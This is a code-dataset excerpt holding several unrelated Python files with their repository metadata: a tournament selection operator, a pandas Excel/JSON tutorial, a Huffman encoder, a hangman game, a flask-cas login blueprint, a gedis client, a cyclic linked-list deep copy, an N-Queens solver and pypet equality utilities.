blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
37468aa39b27a90cb4e0370348c33e722140fafe | Python | lascardua/applied_EA_book | /operators_rep/selection/selection_tournament.py | UTF-8 | 1,439 | 3.375 | 3 | [] | no_license | # -----------------------------------------------------------
# Selection by Tournament
# -----------------------------------------------------------
# Inputs:
# pop_chrom - population of individuals
# pop_fit - fitness value of each individual
# Outputs:
# p1_chrom - chromosome of the first parent
# p2_chrom - chromosome of the second parent
# -----------------------------------------------------------
# file: selection_tournament.py
# -----------------------------------------------------------
import numpy as np
import random
# -----------------------------------------------------------
def selection_tournament(pop_chrom, pop_fit):
    """Tournament selection: sample 3 distinct individuals, return the two fittest.

    Parameters
    ----------
    pop_chrom : ndarray, shape (M, n_genes)
        Chromosomes of the population, one row per individual.
    pop_fit : ndarray, shape (M,)
        Fitness of each individual (higher is better).

    Returns
    -------
    (p1_chrom, p2_chrom) : tuple of ndarray
        Chromosomes of the fittest and the second-fittest sampled individuals.

    Raises
    ------
    ValueError
        If the population holds fewer individuals than the tournament size.
    """
    # number of individuals in the population
    M = np.shape(pop_chrom)[0]
    num_indvs = 3  # tournament size; could be promoted to a formal parameter
    # Sampling num_indvs distinct individuals needs at least that many.
    # (The original sampled from range(1, M), which silently excluded
    # individual 0 from ever being selected, and used exit(), killing the
    # whole process instead of reporting the error to the caller.)
    if M < num_indvs:
        raise ValueError(
            'selection_tournament --> population must hold at least '
            '%d individuals' % num_indvs)
    # randomly select num_indvs distinct indices over the *whole* population
    inds = random.sample(range(M), num_indvs)
    selected_indvs = pop_chrom[inds]
    selected_fits = pop_fit[inds]
    # indices of the sample sorted by descending fitness
    sorted_idx = np.argsort(-selected_fits)
    # the two fittest sampled individuals become the parents
    p1_chrom = selected_indvs[sorted_idx[0]]
    p2_chrom = selected_indvs[sorted_idx[1]]
    return p1_chrom, p2_chrom
| true |
3f542740d593e931dc937dd26617242a25bb61b0 | Python | NickolayVasilishin/repository | /python/ml/pandas/less10.py | UTF-8 | 655 | 3.234375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 15 17:56:06 2016
@author: Nikolay_Vasilishin
From DataFrame to Excel
From Excel to DataFrame
From DataFrame to JSON
From JSON to DataFrame
"""
import pandas as pd
import sys
# Round-trip a small DataFrame through Excel and JSON.
d = [1,2,3,4,5,6,7,8,9]
df = pd.DataFrame(d, columns = ['Number'])
# Export to Excel
df.to_excel('Lesson10.xlsx', sheet_name = 'testing', index = False)
# Path to excel file
# Your path will be different, please modify the path below.
location = r'Lesson10.xlsx'
# Parse the excel file back into a DataFrame
df = pd.read_excel(location, 0)
df.head()
# Export the DataFrame to JSON
df.to_json('Lesson10.json')
# Read the JSON file back.  (The original passed `location` here, i.e. the
# .xlsx path, so read_json choked on binary Excel content instead of
# reading the JSON file that was just written.)
df2 = pd.read_json('Lesson10.json')
ece36c3b4fa8669945a1afb8c5d75b74b3de104b | Python | isaacdchan/CSS343 | /Huffman.py | UTF-8 | 2,263 | 3.421875 | 3 | [] | no_license | from collections import defaultdict
import sys
class Node:
    """A Huffman-tree node: a frequency count plus an optional symbol code."""

    def __init__(self, count, val=None):
        # Leaf nodes carry an ascii code in `val`; internal nodes keep None.
        self.count = count
        self.val = val
        self.left = None
        self.right = None
class Tree:
    """Huffman coding tree built by repeatedly merging the two lowest-count nodes.

    `counts` is a list of leaf Nodes; after construction `self.root` is the
    root of the finished tree (None for an empty input).
    """

    def __init__(self, counts):
        # Keep the working list sorted by ascending count (min first).
        self.counts = sorted(counts, key=lambda node: node.count)
        self.root = None
        self.build()

    def insert(self, node):
        """Insert `node` into self.counts, preserving ascending count order."""
        i = 0
        # Walk past every node with a smaller count; the bounds check was
        # missing in the original, which could run off the end of the list
        # (and its comparison was inverted for ascending order).
        while i < len(self.counts) and node.count > self.counts[i].count:
            i += 1
        self.counts.insert(i, node)

    def build(self):
        """Merge the two smallest nodes until a single root remains.

        Fixes three defects in the original:
        - it popped indices 0 and 1 *after* the first pop, merging the 1st
          and 3rd smallest nodes instead of the two smallest;
        - it never attached the merged nodes as children, so the tree had
          no structure to traverse;
        - it stopped while two nodes were still unmerged (``> 2``), leaving
          an incomplete tree.
        """
        while len(self.counts) > 1:
            # The list is kept sorted ascending, so the two smallest are
            # always at the front.
            node1 = self.counts.pop(0)
            node2 = self.counts.pop(0)
            combined = Node(node1.count + node2.count)
            combined.left = node1
            combined.right = node2
            self.insert(combined)
        self.root = self.counts[0] if self.counts else None
def encode(file_name):
    """Huffman-encode `file_name`: tally symbol counts, build the tree, emit codes."""
    frequency_nodes = generate_counts(file_name)
    huffman_tree = Tree(frequency_nodes)
    generate_codes(huffman_tree.root)
    encoded_file_name = "encoded_" + file_name  # kept as before: computed but unused
def generate_counts(file_name):
    """Read `file_name` and return one Node(count, ascii_code) per occurring character.

    Only characters that actually appear (count > 0) produce a Node.
    """
    # Context manager so the handle is closed even on error (the original
    # opened the file and never closed it).
    with open(file_name, 'r') as f:
        chars = f.read()
    # Histogram over the 256 single-byte character codes.
    ascii_dict = [0] * 256
    for char in chars:
        ascii_dict[ord(char)] += 1
    return [Node(count, ascii_code)
            for ascii_code, count in enumerate(ascii_dict)
            if count > 0]
def generate_codes(root):
    """Walk the Huffman tree and print the bit-code of every symbol.

    Left edges append "0", right edges append "1".  Also returns the
    mapping {ascii_code: bit_string} so callers can use it (backward
    compatible: the original returned None, which nobody consumed).
    """
    code_dict = defaultdict(str)

    def walk(node, code):
        if node is None:
            return
        # Only leaves carry a symbol.  Compare against None: a symbol code
        # of 0 (NUL) is falsy, so the original `if node.val:` dropped it.
        if node.val is not None:
            code_dict[node.val] = code
        # Recurse on the *current* node's children.  The original recursed
        # on root.left/root.right every time, which never terminates.
        walk(node.left, code + "0")
        walk(node.right, code + "1")

    walk(root, "")
    for key, value in code_dict.items():
        print(key, value)
    return code_dict
if __name__ == '__main__':
    # Expect the file to encode as the first command-line argument.
    if len(sys.argv) > 1:
        file_name_input = sys.argv[1]
        # try:
        # NOTE(review): this open() only probes readability; the handle is
        # never closed and encode() re-opens the file itself — verify intent.
        f = open(file_name_input, 'r')
        encode(file_name_input)
        # except Exception as e:
        #     print('Error processing input:', e)
    else:
        print('Please re-run program with file name input') | true |
075a599daa05d808f0b90c3f0dce95e77d8d10f3 | Python | Mbank8/DojoAssignments | /Python/Fundamentals/funWithFunctions.py | UTF-8 | 604 | 3.796875 | 4 | [] | no_license |
# (Earlier warm-up exercises, kept commented out by the author.)
# def odd_even (a):
#     while a < 2001:
#         if a % 2 != 0:
#             print "Number is %d. This is an odd number." % (a)
#             a += 1
#         else:
#             print "Number is %d. This is an even number." % (a)
#             a+= 1
#     return(a)
# odd_even(1)
# def multiply(arr,num):
#     for x in range(len(arr)):
#         arr[x] *= num
#     return arr
# a = [2,4,10,16]
# b = multiply(a,5)
# print b
def layered_multiples(arr):
    # NOTE(review): broken as written (Python 2 file):
    #  - `num` is never defined, so `arr[x] *= num` raises NameError;
    #  - the call below passes a single tuple ([2,4,5], 3), so `arr` is a
    #    2-tuple, not a list of numbers — possibly the author meant Python 2
    #    tuple-parameter unpacking: def layered_multiples((arr, num));
    #  - each element is multiplied and then immediately overwritten with 1.
    # Confirm the assignment's intended behaviour before fixing.
    print arr
    for x in range(len(arr)):
        arr[x] *= num
        arr[x] = 1
    return arr
x = layered_multiples(([2,4,5],3))
print x | true |
59b1f263ef6fe8b5ac65010c44d96f1420b7d59c | Python | stevenwalton/CompMethods | /Python_Notes/Games/hangman.py | UTF-8 | 6,481 | 4.03125 | 4 | [] | no_license | # Hangman game
import random as r
import csv
import os
# First thing we need to do is create the drawings that will be used. Time to employ your ascii art skills.
# You can get more creative and import pictures, but I will leave that for the student to solve. We will
# probably go over pictures and graphs later. But for now let's do this oldschool.
HANGMANPICS = ['''
+---+
| |
|
|
|
|
=======''','''
+---+
| |
O |
|
|
|
=======''','''
+---+
| |
O |
| |
|
|
=======''','''
+---+
| |
O |
/| |
|
|
=======''','''
+---+
| |
O |
/|\|
|
|
=======''','''
+---+
| |
O |
/|\|
/ |
|
=======''','''
+---+
| |
O |
/|\|
/ \|
|
=======''']
# Load the word list from a user-editable text file, one word per line.
### use if you want a set list of words
#dictionary = 'ant baboon badger'.split()
# use if you want to have a file of words that can be read (a dictionary per say)
dictionary = []
# NOTE(review): opening in 'rb' works with csv.reader under Python 2 (this
# file uses Python 2 print statements); Python 3's csv.reader needs a
# text-mode handle.  Each row comes back as a *list* of strings, which is
# why getRandomWord() joins the row's cells.
with open('wordlist.txt', 'rb') as csvfile:
    # This list was made in a way that there is a word on each line. No commas or anything, just \n between words
    reader = csv.reader(csvfile, delimiter=' ')
    dictionary = list(reader)
# We want our program to pick a random word from our dictionary
def getRandomWord(WordList):
    """Return a uniformly random entry from WordList.

    Each entry is a csv row (a list of strings); the row's cells are joined
    with ", ", so a one-word row comes back as the bare word.
    """
    pick = r.randint(0, len(WordList) - 1)
    row = WordList[pick]
    return ', '.join(row)
# We want to display the board, this function will do this
def displayBoard(HANGMANPICS, missedLetters, correctLetters, word):
    """Draw the current game state: gallows, missed letters, and the
    partially revealed secret word."""
    # The picture index equals the number of wrong guesses so far.
    print HANGMANPICS[len(missedLetters)]
    # Show the letters already missed so the player does not repeat them.
    print "Missed letters: " + missedLetters
    # Start with one underscore per letter of the secret word...
    blanks = '_' * len(word)
    # ...then fill in every correctly guessed letter at its position(s).
    for i in range(len(word)):
        if word[i] in correctLetters:
            blanks = blanks[:i] + word[i] + blanks[i+1:]
    print blanks
# Let's make a function to gather the user input for guesses. It's easier to define this as a function
def getGuess(alreadyGuessed):
    """Prompt until the player enters a single, not-yet-guessed, English letter.

    `alreadyGuessed` is the string of letters tried so far (hits and misses).
    """
    while True:
        guess = raw_input("Guess a letter: ")
        guess = guess.lower()  # normalise case so 'A' and 'a' are the same guess
        if len(guess) != 1:
            print "Please enter a single letter..."
        elif guess in alreadyGuessed:
            print "You already guessed that letter!!"
        elif guess not in 'abcdefghijklmnopqrstuvwxyz':
            print "Please print an English letter..."
        else:
            return guess
# Notice what I said before about not assuming your user is intelligent. They might be intelligent but just like breaking programs (which is the best way to learn how it works, might I add).
# Let's clear the screen every time we start a new game or finish. You can also make this clear every loop
def clearScreen():
    """Clear the terminal using the right command for the current platform.

    The original used try/finally, but a finally block always executes and
    os.system() never raises on an unknown command — so *both* 'cls' and
    'clear' ran on every platform (one of them printing a shell error).
    Checking os.name selects exactly one.
    """
    if os.name == 'nt':
        os.system('cls')    # Windows
    else:
        os.system('clear')  # POSIX (Linux, macOS, ...)
#Obviously our game is so great that we will want to play it again. Right? Well let's let the user decide
def playAgain():
    """Ask whether to start another round; truthy only for a 'yes'-ish answer.

    NOTE(review): any answer containing a 'y' counts as yes (so "type"
    would restart too, as the original comment admits); every other answer
    falls through and returns None, which the caller treats as "no".
    """
    again = raw_input("Would you like to play again?(y/n): ").lower()
    if "y" in again: # Note that this will run if they type any word with a y in it. Left as an exercise for the
        # student. How can get words like "type" not to return a new game?
        return True
# Now that we are done with our definitions we will get to the actual game.
# Question for student, why do we not add this as the first line of the while loop? Why here?
print "H A N G M A N"
# Per-round state: letters guessed wrong, letters guessed right, the secret
# word, and whether the round has finished.
missedLetters = '' # We always want to initialize variables
correctLetters = ''
word = getRandomWord(dictionary)
gameIsDone = False
while True:
    # Redraw from scratch on every turn: clear, title, board.
    clearScreen()
    print "H A N G M A N"
    displayBoard(HANGMANPICS, missedLetters, correctLetters, word)
    # Ask for a letter that has not been tried yet (hit or miss).
    guess = getGuess(missedLetters + correctLetters)
    if guess in word:
        correctLetters = correctLetters + guess
        # Win check: every letter of the word must have been guessed.
        foundAllLetters = True # We even initialize this
        for i in range(len(word)):
            if word[i] not in correctLetters:
                foundAllLetters = False
                break
        if foundAllLetters:
            print "Good job! The word was " + word + " You WIN!!!!"
            gameIsDone = True
    else:
        missedLetters = missedLetters + guess
        # Lose check: one miss per picture; the last picture means hanged.
        if len(missedLetters) == len(HANGMANPICS)-1:
            displayBoard(HANGMANPICS, missedLetters,correctLetters,word)
            print "OH NO!!!! You ran out of guesses and let the man die. He could have been innocent! The correct word was " + word
            gameIsDone = True
    if gameIsDone:
        if playAgain() is True:
            # Reset all per-round state and pick a new word.
            clearScreen()
            missedLetters = ''
            correctLetters = ''
            gameIsDone = False
            word = getRandomWord(dictionary)
        else:
            clearScreen()
            break
| true |
12e5b250b785817e2a7f6a5154a5b37779da6049 | Python | MasterRoshan/flask-cas-ng | /flask_cas/routing.py | UTF-8 | 5,347 | 2.625 | 3 | [
"BSD-3-Clause"
] | permissive | import flask
from xmltodict import parse
from flask import current_app
from .cas_urls import create_cas_login_url
from .cas_urls import create_cas_logout_url
from .cas_urls import create_cas_validate_url
try:
from urllib import urlopen
except ImportError:
from urllib.request import urlopen
blueprint = flask.Blueprint('cas', __name__)
@blueprint.route('/login/')
def login():
    """
    This route has two purposes. First, it is used by the user
    to login. Second, it is used by the CAS to respond with the
    `ticket` after the user logs in successfully.

    When the user accesses this url, they are redirected to the CAS
    to login. If the login was successful, the CAS will respond to this
    route with the ticket in the url. The ticket is then validated.
    If validation was successful the logged in username is saved in
    the user's session under the key `CAS_USERNAME_SESSION_KEY` and
    the user's attributes are saved under the key
    'CAS_USERNAME_ATTRIBUTE_KEY'
    """
    cas_token_session_key = current_app.config['CAS_TOKEN_SESSION_KEY']
    # Default destination: the CAS login page, asking it to send the user
    # back to this very route afterwards.
    redirect_url = create_cas_login_url(
        current_app.config['CAS_SERVER'],
        current_app.config['CAS_LOGIN_ROUTE'],
        flask.url_for('.login', origin=flask.session.get('CAS_AFTER_LOGIN_SESSION_URL'), _external=True))
    # CAS redirected back with a service ticket: remember it in the session.
    if 'ticket' in flask.request.args:
        flask.session[cas_token_session_key] = flask.request.args['ticket']
    if cas_token_session_key in flask.session:
        if validate(flask.session[cas_token_session_key]):
            # Valid ticket: send the user on to wherever they wanted to go
            # (session override, ?origin=, or the configured default).
            if 'CAS_AFTER_LOGIN_SESSION_URL' in flask.session:
                redirect_url = flask.session.pop('CAS_AFTER_LOGIN_SESSION_URL')
            elif flask.request.args.get('origin'):
                redirect_url = flask.request.args['origin']
            else:
                redirect_url = flask.url_for(
                    current_app.config['CAS_AFTER_LOGIN'])
        else:
            # Invalid/expired ticket: drop it and fall back to the CAS login.
            del flask.session[cas_token_session_key]
    current_app.logger.debug('Redirecting to: {0}'.format(redirect_url))
    return flask.redirect(redirect_url)
@blueprint.route('/logout/')
def logout():
    """
    When the user accesses this route they are logged out.
    """
    cas_username_session_key = current_app.config['CAS_USERNAME_SESSION_KEY']
    cas_attributes_session_key = current_app.config['CAS_ATTRIBUTES_SESSION_KEY']
    # Drop the locally cached identity before bouncing to the CAS logout page.
    if cas_username_session_key in flask.session:
        del flask.session[cas_username_session_key]
    if cas_attributes_session_key in flask.session:
        del flask.session[cas_attributes_session_key]
    # If configured, tell the CAS where to send the user after logging out.
    if(current_app.config['CAS_AFTER_LOGOUT'] is not None):
        redirect_url = create_cas_logout_url(
            current_app.config['CAS_SERVER'],
            current_app.config['CAS_LOGOUT_ROUTE'],
            current_app.config['CAS_AFTER_LOGOUT'])
    else:
        redirect_url = create_cas_logout_url(
            current_app.config['CAS_SERVER'],
            current_app.config['CAS_LOGOUT_ROUTE'])
    current_app.logger.debug('Redirecting to: {0}'.format(redirect_url))
    return flask.redirect(redirect_url)
def validate(ticket):
    """
    Will attempt to validate the ticket. If validation fails, then False
    is returned. If validation is successful, then True is returned
    and the validated username is saved in the session under the
    key `CAS_USERNAME_SESSION_KEY` while the validated attributes dictionary
    is saved under the key 'CAS_ATTRIBUTES_SESSION_KEY'.
    """
    cas_username_session_key = current_app.config['CAS_USERNAME_SESSION_KEY']
    cas_attributes_session_key = current_app.config['CAS_ATTRIBUTES_SESSION_KEY']
    current_app.logger.debug("validating token {0}".format(ticket))
    # Ask the CAS server to validate the ticket for this service URL.
    cas_validate_url = create_cas_validate_url(
        current_app.config['CAS_SERVER'],
        current_app.config['CAS_VALIDATE_ROUTE'],
        flask.url_for('.login', origin=flask.session.get('CAS_AFTER_LOGIN_SESSION_URL'), _external=True),
        ticket)
    current_app.logger.debug("Making GET request to {0}".format(
        cas_validate_url))
    xml_from_dict = {}
    isValid = False
    try:
        xmldump = urlopen(cas_validate_url).read().strip().decode('utf8', 'ignore')
        xml_from_dict = parse(xmldump)
        isValid = True if "cas:authenticationSuccess" in xml_from_dict["cas:serviceResponse"] else False
    except ValueError:
        current_app.logger.error("CAS returned unexpected result")
    if isValid:
        current_app.logger.debug("valid")
        xml_from_dict = xml_from_dict["cas:serviceResponse"]["cas:authenticationSuccess"]
        username = xml_from_dict["cas:user"]
        attributes = xml_from_dict.get("cas:attributes", {})
        if attributes and "cas:memberOf" in attributes:
            # `basestring` only exists on Python 2; fall back to `str` so the
            # same check works on Python 3, where the original raised
            # NameError (the module otherwise supports py3 via its
            # urllib import fallback).
            try:
                string_types = basestring  # noqa: F821  (Python 2)
            except NameError:
                string_types = str  # Python 3
            # A single string like "[a, b]" is split into a list of groups.
            if isinstance(attributes["cas:memberOf"], string_types):
                attributes["cas:memberOf"] = attributes["cas:memberOf"].lstrip('[').rstrip(']').split(',')
            for group_number in range(0, len(attributes['cas:memberOf'])):
                attributes['cas:memberOf'][group_number] = attributes['cas:memberOf'][group_number].lstrip(' ').rstrip(' ')
        flask.session[cas_username_session_key] = username
        flask.session[cas_attributes_session_key] = attributes
    else:
        current_app.logger.debug("invalid")
    return isValid
| true |
4a2e24ee1975818d98f2f4bd9ffcdb241cb44808 | Python | xmonader/js-ng | /jumpscale/clients/gedis/gedis.py | UTF-8 | 4,921 | 2.75 | 3 | [] | no_license | from jumpscale.clients.base import Client
from jumpscale.core.base import fields
from jumpscale.god import j
from functools import partial
import json
from typing import List
class ActorProxy:
    def __init__(self, actor_name, actor_info, gedis_client):
        """ActorProxy to remote actor on the server side

        Arguments:
            actor_name {str} -- name of the remote actor
            actor_info {dict} -- actor information dict e.g { method_name: { args: [], 'doc':...} }
            gedis_client {GedisClient} -- gedis client reference
        """
        self.actor_name = actor_name
        self.actor_info = actor_info
        self._gedis_client = gedis_client
    def __dir__(self):
        """Delegate the available functions on the ActorProxy to `actor_info` keys

        Returns:
            list -- methods available on the ActorProxy
        """
        return list(self.actor_info.keys())
    def __getattr__(self, attr):
        """Return a function representing the remote function on the actual actor

        Arguments:
            attr {str} -- method name

        Returns:
            function -- function waiting on the arguments
        """
        def mkfun(actor_name, fn_name, *args):
            # NOTE(review): the bound actor_name parameter is ignored here in
            # favour of self.actor_name; both hold the same value in practice.
            return self._gedis_client.execute(self.actor_name, fn_name, *args)
        # Surface the remote method's documentation on the local callable.
        mkfun.__doc__ = self.actor_info[attr]["doc"]
        return partial(mkfun, self.actor_name, attr)
class ActorsCollection:
    def __init__(self, gedis_client):
        """ActorsCollection to allow using the actors like `gedis.actors.ACTORNAME.ACTORMETHOD(*ACTOR_METHOD_ARGS)

        Arguments:
            gedis_client {GedisClient} -- gedis client
        """
        self._gedis_client = gedis_client
        # Cache of actor_name -> ActorProxy, filled lazily by __getattr__.
        self._actors = {}
    @property
    def actors_names(self):
        # TODO: CHECK IF WE SHOULD USE CACHE HERE?
        # NOTE(review): this round-trips to the gedis server on every access.
        return json.loads(self._gedis_client.execute("system", "list_actors"))
    def __dir__(self):
        # Lets tab-completion list the remote actors.
        return self.actors_names
    def _load_actor(self, actor_name):
        """Load actor: creating ActorProxy for remote actor `actor_name` and store it in the collection.

        Arguments:
            actor_name {str} -- remote actor name

        Returns:
            ActorProxy -- ActorProxy that can call the remote actor.
        """
        actor_info = json.loads(self._gedis_client.execute(actor_name, "info"))
        self._actors[actor_name] = ActorProxy(actor_name, actor_info, self._gedis_client)
        return self._actors[actor_name]
    def __getattr__(self, actor_name):
        # Fetch-and-cache a proxy on first attribute access.
        if actor_name not in self._actors:
            return self._load_actor(actor_name)
        else:
            return self._actors[actor_name]
class GedisClient(Client):
    """Client for a gedis server.

    Owns a named redis connection and exposes the server's remote actors
    through ``self.actors`` (attribute-style access via ActorsCollection).
    """

    name = fields.String(default="local")
    hostname = fields.String(default="localhost")
    port = fields.Integer(default=16000)

    def __init__(self):
        super().__init__()
        self._redisclient = None
        # Touch the property so the underlying redis client is created (and
        # persisted) eagerly rather than on first use.
        self.redis_client
        self.actors = ActorsCollection(self)

    @property
    def redis_client(self):
        """Lazily fetch — or create and save — the named redis client."""
        if not self._redisclient:
            try:
                self._redisclient = j.clients.redis.get(f"gedis_{self.name}")
            except Exception:
                # No stored client under this name yet: create and persist
                # one.  (The original used a bare `except:`, which also
                # swallowed SystemExit and KeyboardInterrupt.)
                self._redisclient = j.clients.redis.new(f"gedis_{self.name}")
                self._redisclient.hostname = self.hostname
                self._redisclient.port = self.port
                self._redisclient.save()
        return self._redisclient

    def register_actor(self, actor_name: str, actor_path: str):
        """Register actor on the server side (gedis server)

        Arguments:
            actor_name {str} -- actor name to be used in the system
            actor_path {str} -- actor path on the remote gedis server
        """
        return self.execute("system", "register_actor", actor_name, actor_path)

    def execute(self, actor_name: str, actor_method: str, *args):
        """Execute `actor_method` on remote actor `actor_name` with *args."""
        return self._redisclient.execute_command(actor_name, actor_method, *args)

    def doc(self, actor_name: str):
        """Return the parsed documentation dict of actor `actor_name`."""
        return json.loads(self.execute(actor_name, "info"))

    def ppdoc(self, actor_name):
        """Pretty-print the documentation of actor `actor_name`."""
        res = self.doc(actor_name)
        print(json.dumps(res, indent=2, sort_keys=True))

    def list_actors(self) -> List[str]:
        """Return the names of the actors available on the gedis server."""
        return json.loads(self.execute("system", "list_actors"))
| true |
b2f63e1eb2d1da0b21e2bf4173b030511c7155f3 | Python | Leahxuliu/Data-Structure-And-Algorithm | /Python/巨硬/A1链表深拷贝.py | UTF-8 | 1,919 | 3.734375 | 4 | [] | no_license | '''
链表深copy,可能有环,也可能没有环
'''
'''
是否有重复数?
若无重复数,用一个visited来记录访问点的值 行不通!因为没法curr.next = cycle beginer
1. 判断是否有环
2. 若有环,找环交点,记录环交点
3. 构建新链表
'''
class Node:
    """Singly linked-list node: a value plus a `next` pointer."""

    def __init__(self, val):
        self.next = None  # successor; wired up by the caller
        self.val = val
def copy_node(head):
    '''
    Deep-copy a singly linked list that may contain a cycle.

    Uses Floyd's tortoise/hare to detect a cycle and locate its entry node,
    then walks the original once, cloning nodes behind a dummy head and
    closing the clone back onto the copied cycle entry when that entry is
    reached a second time.

    Returns the head of the copied list (None for an empty list).
    '''
    # corner case: empty list
    if head == None:
        return None
    # (abandoned first attempt, kept for reference: a visited-set approach
    # cannot re-link curr.next back to the cycle entry's clone)
    # visited = set()
    # new_head = Node(0)
    # curr = new_head
    # while head:
    #     if head in visited:
    #         curr.next = 
    #     visited.add(head)
    #     curr.next = Node(head.val)
    #     curr = curr.next
    # Phase 1 (Floyd): detect a cycle; `meet` is where slow and fast
    # pointers first coincide (stays None when the list is acyclic).
    s = head
    f = head
    meet = None
    while s and f and f.next:
        s = s.next
        f = f.next.next
        if s == f:
            meet = s
            break
    # Phase 2 (Floyd): advance one pointer from the head and one from the
    # meeting point in lock step; they coincide at the cycle's entry node.
    # (When the list is acyclic, f is None and the loop is skipped.)
    s = head
    f = meet
    while s != f and f:
        s = s.next
        f = f.next
    meet = f
    # Copy pass: clone node by node behind a dummy head.  The first time
    # the cycle entry is reached its clone is remembered in new_meet; the
    # second time, the clone list is closed onto new_meet instead of
    # cloning the entry again, which reproduces the cycle.
    new_root = Node(0)
    curr = new_root
    new_meet = None
    while head:
        if meet:
            # first visit to the cycle entry: clone it, remember the clone,
            # then fall through and clone the following node as well.
            # NOTE(review): if the entry points to itself (self-loop cycle)
            # this fall-through clones the entry twice — verify.
            if head == meet and new_meet == None:
                curr.next = Node(head.val)
                curr = curr.next
                new_meet = curr
                head = head.next
            # second visit: close the copied cycle and stop
            elif head == meet and new_meet:
                curr.next = new_meet
                break
        curr.next = Node(head.val)
        curr = curr.next
        head = head.next
    return new_root.next
# Demo: build a 4-node list with a cycle, 1 -> 2 -> 3 -> 4 -> 2 (entry at 2).
one = Node(1)
two = Node(2)
three = Node(3)
four = Node(4)
one.next = two
two.next = three
three.next = four
four.next = two
new = copy_node(one)
# Walk both lists in lock step; printed value pairs must match, including
# once the traversal wraps around the cycle.
for i in range(6):
    print(one.val, new.val)
    one = one.next
    new = new.next
| true |
d66c55d189f72d1d3be558982695ab1fd47b7178 | Python | pi408637535/Algorithm | /com/study/algorithm/daily/51. N-Queens.py | UTF-8 | 1,338 | 3.203125 | 3 | [] | no_license | class Solution(object):
def solveNQueens(self, n):
"""
:type n: int
:rtype: List[List[str]]
"""
if n < 1: return []
self.res = [] # res结构[[],[],...],每个元素的res[i]代表着一个解。每个解res[i],每一个元素代表着一个col
self.cols = set()
self.pie = set()
self.na = set()
self.dfs(n, 0, [])
return self._generate_result(n)
def dfs(self, n, row, cur):
# recursion terminator
if row >= n:
self.res.append(cur)
return
for col in range(n):
if col in self.cols or (row + col) in self.pie or (row - col) in self.na:
continue
else:
# update the flags
self.cols.add(col)
self.pie.add(col + row)
self.na.add(row - col)
self.dfs(n, row + 1, cur + [col])
self.cols.remove(col)
self.pie.remove(col + row)
self.na.remove(row - col)
def _generate_result(self, n):
board = []
for res in self.res:
for i in res:
board.append("." * i + "Q" + "." * (n - i - 1))
return [board[i:i + n] for i in range(0, len(board), n)]
# Script entry point: intentionally does nothing when run directly.
if __name__ == '__main__':
    pass | true |
4361eecfcb4b58122b29383805981b1fa04c42f8 | Python | michelbauer/pypet | /pypet/utils/comparisons.py | UTF-8 | 5,434 | 2.90625 | 3 | [
"BSD-3-Clause"
] | permissive | """Module containing utility functions to compare parameters and results"""
__author__ = 'Robert Meyer'
from collections import Sequence, Mapping, Set
try:
from future_builtins import zip
except ImportError: # not 2.6+ or is 3.x
try:
from itertools import izip as zip # < 2.5 or 3.x
except ImportError:
pass
import numpy as np
import pandas as pd
import pypet.pypetconstants as pypetconstants
import pypet.compat as compat
def results_equal(a, b):
"""Compares two result instances
Checks full name and all data. Does not consider the comment.
:return: True or False
:raises: ValueError if both inputs are no result instances
"""
if a.v_is_parameter or b.v_is_parameter:
raise ValueError('Both inputs are not results.')
if a.v_is_parameter or b.v_is_parameter:
return False
if not a.v_name == b.v_name:
return False
if not a.v_location == b.v_location:
return False
if not a.v_full_name == b.v_full_name:
return False
akeyset = set(a._data.keys())
bkeyset = set(b._data.keys())
if akeyset != bkeyset:
return False
for key in a._data:
val = a._data[key]
bval = b._data[key]
if not nested_equal(val, bval):
return False
return True
def parameters_equal(a, b):
"""Compares two parameter instances
Checks full name, data, and ranges. Does not consider the comment.
:return: True or False
:raises: ValueError if both inputs are no parameter instances
"""
if (not b.v_is_parameter and
not a.v_is_parameter):
raise ValueError('Both inputs are not parameters')
if (not b.v_is_parameter or
not a.v_is_parameter):
return False
if not a.v_name == b.v_name:
return False
if not a.v_location == b.v_location:
return False
if not a.v_full_name == b.v_full_name:
return False
# I allow different comments for now
# if not a.get_comment() == b.get_comment():
# return False
if not a._values_of_same_type(a.f_get(), b.f_get()):
return False
if not a._equal_values(a.f_get(), b.f_get()):
return False
if not len(a) == len(b):
return False
if a.f_has_range():
for myitem, bitem in zip(a.f_get_range(), b.f_get_range()):
if not a._values_of_same_type(myitem, bitem):
return False
if not a._equal_values(myitem, bitem):
return False
return True
def nested_equal(a, b):
"""Compares two objects recursively by their elements, also handling numpy objects.
Assumes hashable items are not mutable in a way that affects equality.
Based on the suggestion from HERE_, thanks again Lauritz V. Thaulow :-)
.. _HERE: http://stackoverflow.com/questions/18376935/best-practice-for-equality-in-python
"""
if a is b:
return True
# for types that support __eq__
if hasattr(a, '__eq__'):
try:
custom_eq = a == b
if isinstance(custom_eq, bool):
return custom_eq
except ValueError:
pass
# Check equality according to type type [sic].
if a is None:
return b is None
if isinstance(a, (compat.unicode_type, compat.bytes_type)):
return a == b
if isinstance(a, pypetconstants.PARAMETER_SUPPORTED_DATA):
return a == b
if isinstance(a, np.ndarray):
return np.all(a == b)
if isinstance(a, (pd.Panel, pd.Panel4D)):
return nested_equal(a.to_frame(), b.to_frame())
if isinstance(a, (pd.DataFrame, pd.Series)):
try:
new_frame = a == b
new_frame = new_frame | (pd.isnull(a) & pd.isnull(b))
return np.all(new_frame.as_matrix())
except ValueError:
# The Value Error can happen if the data frame is of dtype=object and contains
# numpy arrays. Numpy array comparisons do not evaluate to a single truth value
if isinstance(a, pd.DataFrame):
for name in a:
cola = a[name]
if not name in b:
return False
colb = b[name]
if not len(cola) == len(colb):
return False
for idx, itema in enumerate(cola):
itemb = colb[idx]
if not nested_equal(itema, itemb):
return False
else:
if not len(a) == len(b):
return False
for idx, itema in enumerate(a):
itemb = b[idx]
if not nested_equal(itema, itemb):
return False
return True
if isinstance(a, Sequence):
return all(nested_equal(x, y) for x, y in zip(a, b))
if isinstance(a, Mapping):
if set(a.keys()) != set(b.keys()):
return False
return all(nested_equal(a[k], b[k]) for k in a.keys())
if isinstance(a, Set):
return a == b
if hasattr(a, '__dict__'):
if not hasattr(b, '__dict__'):
return False
if set(a.__dict__.keys()) != set(b.__dict__.keys()):
return False
return all(nested_equal(a.__dict__[k], b.__dict__[k]) for k in a.__dict__.keys())
return id(a) == id(b) | true |
